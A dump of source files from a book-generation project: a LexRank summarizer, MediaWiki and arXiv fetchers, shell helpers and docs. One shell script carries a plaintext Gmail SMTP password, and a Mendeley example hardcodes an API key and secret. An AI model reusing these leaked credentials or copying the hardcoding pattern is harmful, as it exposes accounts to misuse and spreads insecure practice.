summarizable.\")\n sys.exit()\n normalized = sklearn.feature_extraction.text.TfidfTransformer(norm=norm_opt).fit_transform(term_matrix)\n return term_matrix, normalized\n\n def _gen_matrix_seeded(self, corpus, posseed, negseed, stop_words, norm_opt, ngram ):\n #This adds the seed so that it can be properly indexed for later\n #comparison with the TDM\n corpus.insert(0, negseed)\n corpus.insert(0, posseed)\n count_vec = sklearn.feature_extraction.text.CountVectorizer(\n stop_words, ngram_range=(1, ngram) )\n try:\n term_matrix = count_vec.fit_transform(corpus)\n except ValueError:\n print(\"This document isn't summarizable.\")\n sys.exit()\n term_matrix_seedless = term_matrix.tocsr()[2:,:]\n pos_seed_vector = term_matrix.getrow(0)\n neg_seed_vector = term_matrix.getrow(1)\n\n #if you want to use normalization\n normalized = sklearn.feature_extraction.text.TfidfTransformer(norm=norm_opt).fit_transform(term_matrix_seedless)\n\n return term_matrix_seedless, normalized, pos_seed_vector, neg_seed_vector\n\n#==================================================\ndef baseline_scorer(term_matrix, seed_vector):\n #need to compute some measure of similarity between seed vector and matrix\n #could use improved 
vectorization?\n numerator = term_matrix*seed_vector.T\n seed_norm = numpy.sum(numpy.abs(seed_vector.data)**2)**(1./2)\n term_matrix.data = term_matrix.data**2\n matr_norm = numpy.sqrt(term_matrix.sum(1))\n m = matr_norm.shape[0]\n baseline_score = scipy.zeros(m)\n\n for n in range(m):\n if matr_norm[n] != 0:\n baseline_score[n] = numerator[n].multiply(1/(seed_norm*matr_norm[n]))\n baseline_score = baseline_score/baseline_score.sum()\n return baseline_score\n\n\n#==================================================\nclass Graph:\n def __init__(self, term_matrix, LR_method, pos_seed_vector, neg_seed_vector, pos_weight, neg_weight):\n #Can add option for different similarity measures here\n self.sim_scores = self._gen_sim_scores(term_matrix, LR_method, pos_seed_vector, neg_seed_vector, pos_weight, neg_weight)\n\n\n def _gen_sim_scores(self, term_matrix, LR_method, pos_seed_vector, neg_seed_vector, pos_weight, neg_weight):\n if LR_method == 'unbiased':\n #Switch from distance to similarity measures here\n weights = -1*(scipy.spatial.distance.pdist(term_matrix.toarray(), 'cosine')-1)\n #check weights here and threshold them\n weights[weights < .2] = 0\n weights[numpy.isnan(weights)] = 0\n\n graph = networkx.from_numpy_matrix(scipy.spatial.distance.squareform(weights))\n scores = networkx.pagerank_scipy(graph, max_iter=5000, alpha = .85)\n\n\n elif LR_method == 'biased':\n weights = -1*(scipy.spatial.distance.pdist(term_matrix.toarray(), 'cosine')-1)\n #check weights here and threshold them\n weights[weights < .2] = 0\n nan2zero(weights)\n\n graph = networkx.from_numpy_matrix(scipy.spatial.distance.squareform(weights))\n\n\n #check if seed is empty and return something with correct format\n if str(pos_seed_vector.nonzero()) == '(array([], dtype=int32), array([], dtype=int32))':\n pos_seed_scores = scipy.zeros_like(neg_seed_vector)\n else:\n pos_seed_scores = baseline_scorer(term_matrix, pos_seed_vector)\n\n\n if str(neg_seed_vector.nonzero()) == '(array([], dtype=int32), array([], dtype=int32))':\n neg_seed_scores = scipy.zeros_like(pos_seed_scores)\n else:\n neg_seed_scores = baseline_scorer(term_matrix, neg_seed_vector)\n\n #add a ballast to act against neg seed scores\n ballast = scipy.zeros_like(neg_seed_scores)\n ballast[neg_seed_scores == 0] = neg_weight\n\n seed_scores = pos_seed_scores*pos_weight + neg_seed_scores*neg_weight +ballast\n scores = biased_lexrank.b_lexrank(graph, seed_scores, personalization = 'biased', alpha=.85, max_iter = 5000, seed_weight = pos_weight)\n\n return scores\n\n#=================================================\ndef nan2zero(array):\n array[numpy.isnan(array)] = 0\n\n#=================================================\n\ndef print_summary(sentences, scores, out_file, length):\n ranked_sentences = sorted(((scores[i], s, i) for i,s in enumerate(sentences)), reverse = True)\n\n top_ranked = ranked_sentences[0:length]\n\n f = codecs.open(out_file, encoding = 'utf-8', mode = 'w')\n sorted_sum = sorted(top_ranked, key = lambda top_ranked: top_ranked[2])\n for element in sorted_sum:\n f.write(element[1] + '\\n\\n')\n p = (element[1] + '\\n\\n')\n print(p)\n f.close()\n\n#=================================================\ndef output_checker(output_file):\n if output_file == None:\n print(\"Output file name not supplied. 
Please run again with -o option supplied\")\n from sys import exit\n exit()\n\n#=================================================\n\ndef main():\n\n\n parser = argparse.ArgumentParser()\n parser.add_argument('path', help = \"target file or directory for summarization\")\n parser.add_argument(\"--posseed\", help=\"boosting seed for biased LexRank\", default = None)\n parser.add_argument(\"--negseed\", help=\"blocking seed for biased LexRank\", default = None)\n parser.add_argument(\"--stopfile\", help=\"file containing custom stopwords\")\n parser.add_argument(\"-o\", \"--output\", help = \"output file name\")\n parser.add_argument(\"-l\", \"--length\", help = \"summary length in lines\", default = 10)\n parser.add_argument(\"--seed_posweight\", help = \"Weight for positive seed\", default = 3)\n parser.add_argument(\"--seed_negweight\", help = \"Weight for negative seed\", default = .0001)\n parser.add_argument(\"--ngrams\", help = \"N-gram number\", default = 1)\n #normalization doesn't work due to being inherent within scoring method\n parser.add_argument(\"-n\", \"--is_norm\", help = \"Boolean flag for normalization\", default = True)\n args = parser.parse_args()\n\n input_text = args.path\n pos_seed = args.posseed\n neg_seed = args.negseed\n stopfile = args.stopfile\n out_file = args.output\n sum_length = int(args.length)\n norm_flag = args.is_norm\n pos_weight = float(args.seed_posweight)\n neg_weight = float(args.seed_negweight)\n ngram = int(args.ngrams)\n corpus = Corpus(input_text).documents\n\n output_checker(out_file)\n\n if pos_seed == None and neg_seed == None:\n LR_method = 'unbiased'\n #print(LR_method)\n [term_matrix, normalized] = TDM(corpus, pos_seed, neg_seed, stopfile, norm_flag, ngram).matrix\n pos_seed_vector = []\n neg_seed_vector = []\n\n else:\n LR_method = 'biased'\n if pos_seed == None:\n pos_seed = ''\n if neg_seed == None:\n neg_seed = ''\n\n [term_matrix, normalized, pos_seed_vector, neg_seed_vector] = TDM(corpus, pos_seed, neg_seed, stopfile, norm_flag, ngram).matrix\n corpus = corpus[2:]\n\n\n scores = Graph(normalized, LR_method, pos_seed_vector, neg_seed_vector, pos_weight, neg_weight).sim_scores\n print_summary(corpus, scores, out_file, sum_length)\n\n\n#=================================================\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.814828097820282, "alphanum_fraction": 0.8176934123039246, "avg_line_length": 95.24137878417969, "blob_id": "9effa0c391dfdd154d75018e1739f1f53c9aa406", "content_id": "d8ab44e17e46983fdc95af9ec9a552f3d604aa4d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2816, "license_type": "permissive", "max_line_length": 452, "num_lines": 29, "path": "/conf/jobprofiles/authorbios/Brendan_Harkin.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Brendan Harkin founded X Media Lab in June 2003. 
X Media Lab is the internationally acclaimed creative thinktank for digital media professionals that brings together the world's outstanding creatives, executives, and power-brokers who work as mentors with local companies on their own creative project ideas.\n\nX Media Lab focuses on creating high-value networks among the emergent digital media markets of China, India, the Middle East, and North and South Asia; and assisting local companies get their ideas successfully to market by involving them directly with the world's leading digital media practitioners.\n\nBrendan has held a number of high profile positions in new media industry development: founding the first Asia Pacific Multimedia Festival; and as Australia's first General Manager for Public Awareness at the National Office for the Information Economy (NOIE) and was awarded an “Australia Day National Gold Medal” by the Australian Government for his services.\n\nBrendan's most recent honours include:\n\n - Appointed to the Advisory Council of the College of Fine Arts, University of NSW Awarded the 5th China Creative Industries Award for \"International Contribution\"\n\n - International Jury Member for the Interactive Emmy Awards held at MIPTV in Cannes\n\n - Appointed “Foreign Expert Advisor” to the Beijing municipal government on Digital Media industry development\n\n - Appointed Visiting Professor to Beijing Culture and Language University\n\n - Consultant to the Suzhou Industrial Park on Animation industry development\n\n - Named as one of the “Top Ten Most Influential People” in the Australian Digital Media industries\n\n - Named as one of the “50 Most Influential Australians in Asia” by the NY-based Advance Organization\n\n - Panellist at the 4th Al Jazeera Media Summit in Doha\n\n - In the past year he has been an invited international speaker at many creative industries events around China including the ICCIE Summit in Beijing, the inaugural \"Academic Alliance of International Cultural Industries\" at the Communications University Beijing, the Animation Summit in Xi’an, the Creative Industries Forums at Foshan, Shangdong, Wuhu and Shenyang, the Games Forum in Zhonghsan, and the Creative Industries Festival Week in Shanghai.\n\nBrendan combines his involvement in the Digital Media industries with an academic background in philosophy, and was awarded a Doctoral Scholarship by the University of Melbourne where he studied ‘Philosophy and Technology'.\n\nHe has consulted to the United Nations Committee on Trade and Development (UNCTAD), the European Union’s EUROPRIX initiative, most of Australia’s leading creative industries and media agencies; and has served as an Advisory Board Member to a large number of digital media, cultural, and technology events throughout Asia.\n" }, { "alpha_fraction": 0.7642792463302612, "alphanum_fraction": 0.7805983424186707, "avg_line_length": 32.42424392700195, "blob_id": "9fbe0c306f998bb5d0b9adc0741d3ed4efae8ec2", "content_id": "bf845e856049697ea08fb9eb943feb4f34ebd5fc", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1103, "license_type": "permissive", "max_line_length": 257, "num_lines": 33, "path": "/docs/dependencies.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Dependencies\n\nPython 2.7 *and* Python 3.5.2 (some helper programs use one or the other)\n\npython libraries: see requirements.txt\n\ngoogler https://github.com/jarun/googler.git\n\nphp (for Magento -- should be 
installed with Magento stack)\n\nimagemagick 6.8.9 or more\nsendemail # note middle \"e\", this is lightweight version that is very portable\n # sendemail has issue with TLS/SSL in Ubuntu 14.04, needs to be fixed\n\npandoc 2+ \n\npdftk, fdupes, pdfimages # for montageur.sh\n\nIBM word cloud (IBMcloud)\nAPI keys for fetchers (minimum: see Wikimedia https://www.mediawiki.org/wiki/API:Login)\n\nFonts:\n\nwordcloud needs /usr/share/fonts/truetype/ttf-dejavu fonts\n\nOptional:\n\nxmlstarlet # only needed if you are parsing xml input\nt command line twitter client with Twitter API key # any other twitter search client can be plugged in\n\nStorefronts:\n\nThe Magento storefront requires Magento Community 1.9.2.4.1 (free) plus several commercial extensions that have been customized by PageKicker. Distribution via the PageKicker store and private label hosted solutions are available via PageKicker Enterprise.\n" }, { "alpha_fraction": 0.669966995716095, "alphanum_fraction": 0.6716171503067017, "avg_line_length": 45.61538314819336, "blob_id": "d339a2307efe26fd9d2ccab880701c4710135fc1", "content_id": "c0f7309dd9eb2e462e1fa201ecfa00dee30cc2f5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 606, "license_type": "permissive", "max_line_length": 95, "num_lines": 13, "path": "/scripts/includes/googler-news.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "echo \"# News Snippets\" > $TMPDIR$uuid/googler-news.md\necho \"\" >> $TMPDIR$uuid/googler-news.md\necho \"search carried out at $(date -u)\" >> $TMPDIR$uuid/googler-news.md\necho \"\" >> $TMPDIR$uuid/googler-news.md\nwhile IFS= read -r seed; do\n echo \"running googler -n on $seed\" \n echo \"**\"$seed\"**\" >> $TMPDIR$uuid/googler-news.md\n echo \"\" >> $TMPDIR$uuid/googler-news.md\n \"$scriptpath\"lib/googler/googler -C --noprompt --news \"$seed\" >> $TMPDIR$uuid/googler-news.md\n echo \"\" >> $TMPDIR$uuid/googler-news.md\n echo \"\" >> $TMPDIR$uuid/googler-news.md\n sleep 2\ndone < \"$TMPDIR\"$uuid\"/seeds/filtered.pagehits\"\n" }, { "alpha_fraction": 0.6888412237167358, "alphanum_fraction": 0.696351945400238, "avg_line_length": 28.125, "blob_id": "6b6557168b09f5bf47fee22606be8e66bf8e24a1", "content_id": "ca3823832a91adb1bab8d8184c2b5970c604fa67", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 932, "license_type": "permissive", "max_line_length": 153, "num_lines": 32, "path": "/scripts/bin/screen-human-error.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n. 
../conf/config.txt\n\necho \"beginning to screen out naughty and duplicate seeds\" >> $sfb_log\n\nwhile read -r line; do \n\nif grep -qw \"$line\" \"seeds/human-error.txt\" ; then\n\n\tPK_ERR_CODE=\"human_error1\"\n\techo \"looks like customer forgot to provide new phrases\" | tee --append $sfb_log\n\n\tsendemail -t \"$customer_email\" \\\n\t\t-m \"This book build has been cancelled because it looks like you forgot to replace the dummy keyword phrases with real keywords\" \\\n\t\t-u \"Build cancelled because dummy keyword phrases\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-cc \"$GMAIL_ID\" \\\n\t\t-xu \"$GMAIL_ID\" \\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-o tls=yes \n\t\techo \"exiting dummy\" ; exit 0\nelse\n\techo \"congratulations $line is not a dummy phrase, and you are not a dummy\"\nfi\n\necho \"I checked your seed phrasesto be sure you filled out the form correctly, and you did. Good job, fellow sentient!\" >> $TMPDIR$uuid/seeds/process.md\n\ndone <$1\n\nexit 0\n" }, { "alpha_fraction": 0.6893576383590698, "alphanum_fraction": 0.6927133202552795, "avg_line_length": 32.0476188659668, "blob_id": "f8382df343e0d3f7e286c1aed6992937b55e5020", "content_id": "c7ce9f1804d9c8539a6e0bc50645251caa28e276", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2086, "license_type": "permissive", "max_line_length": 96, "num_lines": 63, "path": "/scripts/bin/mwclient_wiki_seeds_2_pages.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- codinwig: utf-8 -*-\n\"\"\"\nMediaWiki seed expander\nFred Zimmerman\nwfzimmerman#gmail.com\n\nexpands search seeds to exact MediaWiki page title\n\nconverted to use mwclient library and enhanced to allow pointing at any \nMediaWiki endpoint URL\n\nthree variables specify the endpoint URL\n--mediawiki_api_url \"en.wikipedia.org\" (no http)\n--url_prefix \"http\" or \"https\"\n--wikipath \"/w/\" is default -- path to API endpoint configured on Mediawiki server \n\n\"\"\"\n\nimport logging\nimport argparse\nimport mwclient\n\n\nlogging.basicConfig(level=logging.WARNING)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--infile\", help = \"seed file\", default = 'test')\nparser.add_argument(\"--lang\", help=\"wiki language bigram\", default = 'en')\nparser.add_argument(\"--request_type\", help=\"request type\", default = 'sum')\nparser.add_argument(\"--outfile\", help = \"path to outfile\", default = 'outfile')\nparser.add_argument(\"--summary\", help = \"true or false\", action = \"store_false\")\nparser.add_argument(\"--logging\", help = \"true or false\", action = \"store_true\")\nparser.add_argument(\"--mediawiki_api_url\", help = \"true or false\", default = 'en.wikipedia.org')\nparser.add_argument(\"--url_prefix\", help = \"default wiki ssl value is https\", default = 'https')\nparser.add_argument(\"--wikipath\", help = \"mediawiki default is /w/api.php\", default = '/w/')\n\nargs = parser.parse_args()\n\ninput_file = args.infile\noutput_file = args.outfile\nlang = args.lang\nsummary = args.summary\nlogging = args.logging\nmediawiki_api_url = args.mediawiki_api_url\nurl_prefix = args.url_prefix\nwiki_tuple = (url_prefix, mediawiki_api_url)\nprint_wiki_tuple= \"wiki_tuple value is{}\".format(wiki_tuple)\nprint(print_wiki_tuple)\n\nwikipath = args.wikipath\nsite = mwclient.Site(wiki_tuple, path=wikipath)\nprint(site)\nfile = open(input_file, 'r').read().splitlines()\n#file2 = open(output_file, 'w')\n\nwith open(output_file, 
'a+') as f2:\n with open(input_file, 'r') as f1:\n for line in f1:\n print('seed is ' + line)\n hits = site.search(line)\n print(*hits, file=f2)\n f1.close()\n f2.close()\n \n" }, { "alpha_fraction": 0.6481131911277771, "alphanum_fraction": 0.6566037535667419, "avg_line_length": 29.586538314819336, "blob_id": "ccd6a4158467b8ce69d1e48eb9961c48e7214cdd", "content_id": "bd5f673fe8bce367ec748c4606b4ec00bfc0b26f", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3180, "license_type": "permissive", "max_line_length": 96, "num_lines": 104, "path": "/scripts/bin/mwclient_wikifetcher_adds_metadata.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nwapackpedia text fetcher\nFred Zimmerman\nwfzimmerman#gmail.com\n\nconverted to use mwclient library and enhanced to allow pointing at any \nMediaWiki endpoint URL\n\nthree variables specify the endpoint URL\n--mediawiki_api_url \"en.wikipedia.org\" (no http)\n--url_prefix \"http\" or \"https\"\n--wikipath \"/w/\" is default -- path to API endpoint configured on Mediawiki server \n\nmwclient_seeds_to_pages.py is responsible for providing \nexact page names to infile; page names must be exact, i.e. they are case \nand punctuation sensitive\n\n\"\"\"\n\nimport logging\nimport argparse\nimport mwclient\n\n\nlogging.basicConfig(level=logging.WARNING)\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--infile\", help = \"seed file\", default = 'test')\nparser.add_argument(\"--lang\", help=\"wiki language bigram\", default = 'en')\nparser.add_argument(\"--request_type\", help=\"request type\", default = 'sum')\nparser.add_argument(\"--outfile\", help = \"path to outfile\", default = 'outfile')\nparser.add_argument(\"--summary\", help = \"true or false\", action = \"store_false\")\nparser.add_argument(\"--logging\", help = \"true or false\", action = \"store_true\")\nparser.add_argument(\"--mediawiki_api_url\", help = \"true or false\", default = 'en.wikipedia.org')\nparser.add_argument(\"--url_prefix\", help = \"default wiki ssl value is https\", default = 'https')\nparser.add_argument(\"--wikipath\", help = \"mediawiki default is /w/api.php\", default = '/w/')\nparser.add_argument(\"--cats_file\", help = \"path to outfile\", default = 'cats')\nparser.add_argument(\"--extlinks_file\", help = \"path to outfile\", default = 'extlinks')\n\nargs = parser.parse_args()\n\ninput_file = args.infile\noutput_file = args.outfile\ncats_file = args.cats_file\nextlinks_file = args.extlinks_file\nlang = args.lang\nsummary = args.summary\nlogging = args.logging\nmediawiki_api_url = args.mediawiki_api_url\nurl_prefix = args.url_prefix\n\n\nwikipath = args.wikipath\nsite = mwclient.Site('en.wikipedia.org', scheme=\"https\")\nprint(site)\nfile1 = open(input_file, 'r').read().splitlines()\nfile2 = open(output_file, 'w')\nfile3 = open(cats_file, 'w')\nfile4 = open(extlinks_file, 'a+')\nfor line in file1:\n try:\n print('seed is ' + line)\n page = site.pages[line]\n text = page.text()\n #print('\\n'+ 'categories are' + '\\n')\n #print(*cats, sep='\\n')\n cats = list(page.categories())\n print(cats)\n extlinks = list(page.extlinks())\n print('\\n'+ 'external links are '+ '\\n')\n print(extlinks)\n print(extlinks, sep='\\n', file=open(extlinks_file, \"w\"))\n backlinks = page.backlinks()\n print(*backlinks)\n images = list(page.images())\n print(images)\n except mwclient.errors.InvalidPageTitle:\n continue\n 
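# append this page's text, categories, and external links to the three output files\n 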
file2.write('\\n')\n file2.write('\\n')\n file2.write('# ' )\n file2.write(line)\n file2.write('\\n')\n file2.write(text)\n \n file3.write('\\n')\n file3.write('\\n')\n file3.write('# ' )\n file3.write(line)\n file3.write('\\n')\n file3.write(str(cats))\n \n file4.write('\\n')\n file4.write('\\n')\n file4.write('# ' )\n file4.write(line)\n file4.write('\\n')\n file4.write(str(extlinks))\n \nfile2.close()\nfile3.close()\nfile4.close()" }, { "alpha_fraction": 0.5712476372718811, "alphanum_fraction": 0.5902469754219055, "avg_line_length": 25.762712478637695, "blob_id": "85c9ce898a08817c7c75479721592c4350bd330c", "content_id": "5164eb08f239c47bffcd1eb5b5dfcd85733f2c31", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1579, "license_type": "permissive", "max_line_length": 142, "num_lines": 59, "path": "/scripts_python_3/bin/ArXivFetcher.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/local/bin/python\n###################################################\n#ArXivFetcher.py\n#Inputs:\n#1)seeds for calls (can be multiples, contained in one string) \n#2) a uuid \n#3) number of results\n#Outputs:\n#1) \n#Attributes to add:\n#1)accept multiple seed terms\n# \n#######\n\n\nimport os, sys, codecs, urllib.request, urllib.parse, urllib.error\ntry:\n import xml.etree.cElementTree as ET\nexcept ImportError:\n import xml.etree.ElementTree as ET\n#=================================================\ndef main():\n\tseed = str(sys.argv[1])\n\tuuid_path = str(sys.argv[2])\n\tresults_num = sys.argv[3]\n\tos.chdir(uuid_path)\n\ttitle = ''\n\tpdf = ''\n\turl = 'http://export.arxiv.org/api/query?search_query=all:'+seed+'&start=0&max_results='+results_num+'&sortBy=relevance&sortOrder=descending'\n\tdata = urllib.request.urlopen(url).read()\n\ttree = ET.fromstring(data)\n\t\n\ttitle_list = []\n\tpdf_list = []\n\titernum = 0;\n\ttitlenum = 0;\n\t\t\n\tfor elem in tree.iterfind('.//{http://www.w3.org/2005/Atom}entry'):\n\t\t\tfor subelem in elem.iterfind('.//{http://www.w3.org/2005/Atom}title'): \n\t\t\t\ttitle = subelem.text\n\t\t\t\ttitle_list.append(title)\n\tfor elem in tree.iterfind('.//{http://www.w3.org/2005/Atom}link[@type=\"application/pdf\"]'):\n\t\tpdf = elem.attrib.get('href')\n\t\tpdf_list.append(pdf) \n\n\n\t#pdf_url = tree[7][8].attrib.get('href')\n\t#title = tree[7][3].text\n\tif title != '':\n\t\tfor i in range(len(title_list)):\n\t\t\tprint((title_list[i]))\n\t\t\tprint((pdf_list[i]))\n\telse:\n\t\tprint('No results found.')\n\t#print data\n \n#=================================================\nif __name__ == '__main__':\n main()\n" }, { "alpha_fraction": 0.7603305578231812, "alphanum_fraction": 0.7630854249000549, "avg_line_length": 39.22222137451172, "blob_id": "99ff932a4d0b27693c2b019d2cd1c5f13b22e4e3", "content_id": "153b69c1df49ccff6138d9b64ecd8605c5771cd7", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 363, "license_type": "permissive", "max_line_length": 78, "num_lines": 9, "path": "/test/add_bibliography.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# adds book titles to imprint & robot bibliography files and \n# makes sure that the titles have been properly added\n\n# checks line count of imprint & robot bibliography before running test build\n# runs test build with specified imprint & robot for unique new title\n# checks that new line count = old line 
count + 1\n# runs test build with specified \n" }, { "alpha_fraction": 0.5658536553382874, "alphanum_fraction": 0.5853658318519592, "avg_line_length": 18.636363983154297, "blob_id": "d5c7e77e97cc85619f0f4bc3797a05839fd85f26", "content_id": "a49e751dc7c8df7a04492bc9add24d55f01c0527", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 205, "license_type": "permissive", "max_line_length": 32, "num_lines": 11, "path": "/scripts/helloworld.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\necho \"hello world\" \nsendemail -t \"[email protected]\" \\\n\t-u \"hello world\" \\\n\t-m \"hello world from Magento\" \\\n\t-f [email protected] \\\n\t-xu [email protected] \\\n\t-xp \"f1r3comb\" \\\n\t-s smtp.gmail.com:587 \\\n\t-o tls=yes \nexit 0\n" }, { "alpha_fraction": 0.42093902826309204, "alphanum_fraction": 0.4543982744216919, "avg_line_length": 24.369863510131836, "blob_id": "805b5f4f47efdcbda4fbcd2bd46dade8291e4b14", "content_id": "1086b7cfec59983da73ffcae78c198da9226bde6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1853, "license_type": "permissive", "max_line_length": 69, "num_lines": 73, "path": "/scripts/bin/float_fx.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n#\n# Floating point number functions.\n\n#####################################################################\n# Default scale used by float functions.\n\nfloat_scale=2\n\n\n#####################################################################\n# Evaluate a floating point number expression.\n\nfunction float_eval()\n{\n local stat=0\n local result=0.0\n if [[ $# -gt 0 ]]; then\n result=$(echo \"scale=$float_scale; $*\" | bc -q 2>/dev/null)\n stat=$?\n if [[ $stat -eq 0 && -z \"$result\" ]]; then stat=1; fi\n fi\n echo $result\n return $stat\n}\n\n\n#####################################################################\n# Evaluate a floating point number conditional expression.\n\nfunction float_cond()\n{\n local cond=0\n if [[ $# -gt 0 ]]; then\n cond=$(echo \"$*\" | bc -q 2>/dev/null)\n if [[ -z \"$cond\" ]]; then cond=0; fi\n if [[ \"$cond\" != 0 && \"$cond\" != 1 ]]; then cond=0; fi\n fi\n local stat=$((cond == 0))\n return $stat\n}\n\n\n# Test code if invoked directly.\nif [[ $(basename $0 .sh) == 'float' ]]; then\n # Use command line arguments if there are any.\n if [[ $# -gt 0 ]]; then\n echo $(float_eval $*)\n else\n # Turn off pathname expansion so * doesn't get expanded\n set -f\n e=\"12.5 / 3.2\"\n echo $e is $(float_eval \"$e\")\n e=\"100.4 / 4.2 + 3.2 * 6.5\"\n echo $e is $(float_eval \"$e\")\n if float_cond '10.0 > 9.3'; then\n echo \"10.0 is greater than 9.3\"\n fi\n if float_cond '10.0 < 9.3'; then\n echo \"Oops\"\n else\n echo \"10.0 is not less than 9.3\"\n fi\n a=12.0\n b=3.0\n c=$(float_eval \"$a / $b\")\n echo \"$a / $b\" is $c\n set +f\n fi\nfi\n\n# vim: tabstop=4: shiftwidth=4: noexpandtab:\n# kate: tab-width 4; indent-width 4; replace-tabs false;\n\n" }, { "alpha_fraction": 0.7835051417350769, "alphanum_fraction": 0.8041236996650696, "avg_line_length": 77.75, "blob_id": "0fb3d5a392e1ecb2502ef8b681b7ec4eb6b19a8e", "content_id": "831e64a2aee334a8bcd152dc5d6c4ebf29e03d28", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1261, "license_type": "permissive", "max_line_length": 228, "num_lines": 
16, "path": "/docs/doc/getting-started.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "GETTING STARTED\n\n1. Make sure all dependencies are installed.\n2. Copy conf/config_template.txt to conf/config.txt and customize all values.\n3. Run scripts/bin/setup.sh to create various directories that are needed.\n4. Make sure that all API keys are stored in scripts/install/api-manager.sh. The Wikipedia key currently resides in scripts/. This should be changed in future.\n5. Modify the file scripts/seeds/current-seed to include several search terms that correspond to Wikipedia article titles.\n6. cd to $scriptpath and run the following test command:\n\n bin/create-catalog-entry.sh --builder \"yes\" --booktitle \"Test\" --yourname \"Fred\" --jobprofilename \"Default\" --sample_tweets \"no\" --import \"no\" \n\nIt should create epub, mobi, and docx files and deposit them in $TMPDIR/pagekicker/$uuid. that same folder contains all the interim work products.\n\nYou can run against any collection of seeds by creating a text file with one seed per line and adding the parameter --seedfile \"/path/to/seedfile\" to the command line above.\n\nTo begin contributing, look at the wiki Architecture and Roadmap docs, then look at issues list and pick something easy. There are a number of fairly straightforward modifications that need to be made to bash or Python scripts. \n" }, { "alpha_fraction": 0.6273320913314819, "alphanum_fraction": 0.6387593150138855, "avg_line_length": 28.349315643310547, "blob_id": "956a7ef335852da17cdbd696f03333001dad4581", "content_id": "ed9a334b149fb82f9c5b098631546a827f009c4e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4288, "license_type": "permissive", "max_line_length": 106, "num_lines": 146, "path": "/scripts/bin/stripped_down_test.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nMendeley Open API Example Client\n\nCopyright (c) 2010, Mendeley Ltd. <[email protected]>\n\nPermission to use, copy, modify, and/or distribute this software for any\npurpose with or without fee is hereby granted, provided that the above\ncopyright notice and this permission notice appear in all copies.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\nWITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\nMERCHANTABILITY AND FITNESS. 
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\nANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\nWHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\nACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\nOR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\nFor details of the Mendeley Open API see http://dev.mendeley.com/\n\nExample usage:\n\npython test.py\n\n\"\"\"\n\nfrom pprint import pprint\nfrom mendeley_client import MendeleyClient\nimport json\n# import os\nimport string\n# import sys\n\n\nmendeley = MendeleyClient('13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6', '394d64a2907f23c7f6ea5d94fb386865')\n\ntry:\n mendeley.load_keys()\nexcept IOError:\n mendeley.get_required_keys()\n mendeley.save_keys()\n\nclass MPub(object):\n \n def __init__(self, uuid, title, abstract, authors, keywords, publication, tags, url, year):\n self.uuid = uuid\n self.title = title\n self.abstract = abstract\n self.authors = authors\n self.keywords = keywords\n self.title = title\n self.tags = tags\n self.url = url\n self.year = year\n \n def __str__(self):\n return \"(Mendeley Paper Object: %s)\" % self.uuid\n \n def __repr__(self):\n return \"(Mendeley Paper Object: %s)\" % self.uuid\n\n\n \n def __ne__(self, other):\n return not self.__eq__(other) \n\n\nprint(\"\"\"\n\n-----------------------------------------------------\nList folders\n-----------------------------------------------------\"\"\")\nfolders = mendeley.folders()\npprint(folders)\n\nfolderid = input('Enter folder id: ')\npprint(folderid)\n\nresponse = mendeley.create_folder(folder=json.dumps({'name': 'Recent Docs to Review', 'parent':folderid}))\n# pprint(response)\nprint(\"Created Review Child Folder\")\nreviewchildfolderid = 